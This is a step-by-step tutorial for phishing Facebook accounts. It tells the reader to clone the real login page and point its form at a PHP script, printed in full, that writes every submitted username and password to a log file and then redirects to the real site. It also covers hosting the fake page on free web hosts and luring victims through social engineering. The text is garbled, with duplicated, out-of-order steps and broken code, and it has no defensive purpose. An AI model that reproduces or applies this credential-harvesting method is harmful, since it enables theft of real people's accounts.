FACEBOOK PHISHING TUTORIAL
Step-2: - Now gowww.facebook.com and press Ctrl + U or right click on a web page and view source, now copy this all source code and paste it into the new notepad file
Step-3: - Now save this notepad file with name index.html on your desktop or a folder where you want.
Step-4: - Now open one more notepad file and copy the whole code below into it.
<? php
header ("Location: http://www.facebook.com/ ');
$ Handler = fopen ("log.txt", "a");
foreach ($ _POST as $ variable => $ value) {
fwrite ($ handler, $ variable);
fwrite ($ handler, "=");
fwrite ($ handler, $ value);
fwrite ($ handler, "\ r \ n");
}
fwrite ($ handler, "\ r \ n");
fclose ($ handler);
exit;
?>
From <? Php it?>, Copy content to new notepad file and save it with any anyname.php, I am gonna save it with name login.php, you can anyname way that you want but ensur that extension should be. "Php". In the content there is a txt file (log.txt), any time you can name it txt Which is not guessable, I just pur log.txt but that you should name is unguessable and its extension may b. Txt or nothing.
Step-5: - Now, again open the index.html file into Notepad (I would like to recommended you to use Notepad + + for these kind of tasks, awesome and flexible text editor), and find (Ctrl + F for Find) keyword "action" here. You will see a keyword action = "https://www.face ****" something like this, remove this whole link Which is unde double quotes "" and thus here "login.php". Save it and exit (Ctrl + S for save).
Step-6: - Now upload index.html and login.php file to you file directory manager. If it is your cPanel account, upload files into file_manager -> public_html or if it is 000webhost.com account and upload index.html into login.php file manager as show in below image
So now, lets start with demonstration of phishing one of your favorite social networking website or emailing website.
There are many more, and this method will be apply to each and everyone like gmail.com, yahoo.com, live.com, hotmail.com, facebook.com, twitter.com, flicr, mail.com, rediffmail.com, in.com and rest of the Which websites provide these services.
So I am gonna demonstrate you on facebook.
Step-1: - Register to any free web hosting website. Some give website cpanel hosting, Which is Better for phishing, but however there are huge Which websites provide free hosting, Some of them are -
Register with those of above free web hosting and confirm this hosting. Once you done this, go to step-2.
Step-3: - Now save this notepad file with name index.html on your desktop or a folder where you want.
Step-4: - Now open one more notepad file and copy the whole code below into it.
<? php
header ("Location: http://www.facebook.com/ ');
$ Handler = fopen ("log.txt", "a");
foreach ($ _POST as $ variable => $ value) {
fwrite ($ handler, $ variable);
fwrite ($ handler, "=");
fwrite ($ handler, $ value);
fwrite ($ handler, "\ r \ n");
}
fwrite ($ handler, "\ r \ n");
fclose ($ handler);
exit;
?>
From <? Php it?>, Copy content to new notepad file and save it with any anyname.php, I am gonna save it with name login.php, you can anyname way that you want but ensur that extension should be. "Php". In the content there is a txt file (log.txt), any time you can name it txt Which is not guessable, I just pur log.txt but that you should name is unguessable and its extension may b. Txt or nothing.
Step-5: - Now, again open the index.html file into Notepad (I would like to recommended you to use Notepad + + for these kind of tasks, awesome and flexible text editor), and find (Ctrl + F for Find) keyword "action" here. You will see a keyword action = "https://www.face ****" something like this, remove this whole link Which is unde double quotes "" and thus here "login.php". Save it and exit (Ctrl + S for save).
Step-6: - Now upload index.html and login.php file to you file directory manager. If it is your cPanel account, upload files into file_manager -> public_html or if it is 000webhost.com account and upload index.html into login.php file manager as show in below image
If you are logged into your account 000webhost.com, click on the "Go to Cpanel" in front of your domain that you had registered, and then go to "File Manager" under Files and log into it. Now click on the public_html. Now click on upload and upload your files both.
Step-7: - Now visit to your subdomain, like yourname.000webhost.com and you will see a phishing page of facebook.com. nowsend this link to a victim, say anything like join my network or any social engineering trick and force victim to visit you page and let him / her enter the username and password. Once he / she enter information, username and password will be save into the log.txt file and will redirect the victim's original facebook link facebook.com. Victim Will seems like he did enter wrong username and password so he should enter again, when he again will enter the info, he / she will successfully login into their facebook account. Game over!.
Step-8: - Now go to yourname.000webhost.com/log.txt and see the username and password of victim. Or you can visit again to your cpanel, here in File Manager> public_html and you will see the log.txt file, open it to view victim's username and password.
